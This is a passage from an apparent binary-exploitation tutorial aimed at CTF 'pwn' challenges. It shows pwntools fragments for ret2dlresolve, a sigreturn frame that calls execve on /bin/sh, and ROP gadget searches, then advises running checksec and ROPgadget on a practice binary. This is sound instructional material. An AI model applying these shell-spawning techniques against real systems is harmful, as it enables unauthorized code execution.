rop.read(0, dlr.data_addr); rop.ret2dlresolve(dlr)
# Auto-build an SROP frame
frame = SigreturnFrame()
frame.rax = constants.SYS_execve
frame.rdi = binsh; frame.rip = syscall_gadget
# Find a specific gadget
rop.find_gadget(['pop rdi', 'ret'])
rop.find_gadget(['syscall', 'ret'])

The attacker's job is not to find the exploit. It is to look at what the binary handed you and decide what language to program in. Once you see it that way, you stop asking whether you have a ROP chain and start asking which dialect fits.

One concrete move. Pick a pwn binary you have not solved. Run checksec ./vuln, grep the PLT, run ROPgadget --binary ./vuln --multibr. Before opening a browser, name the rung you would try first and the exact precondition you think it satisfies. Then try it. The ladder is only useful if you can read a binary and call the rung.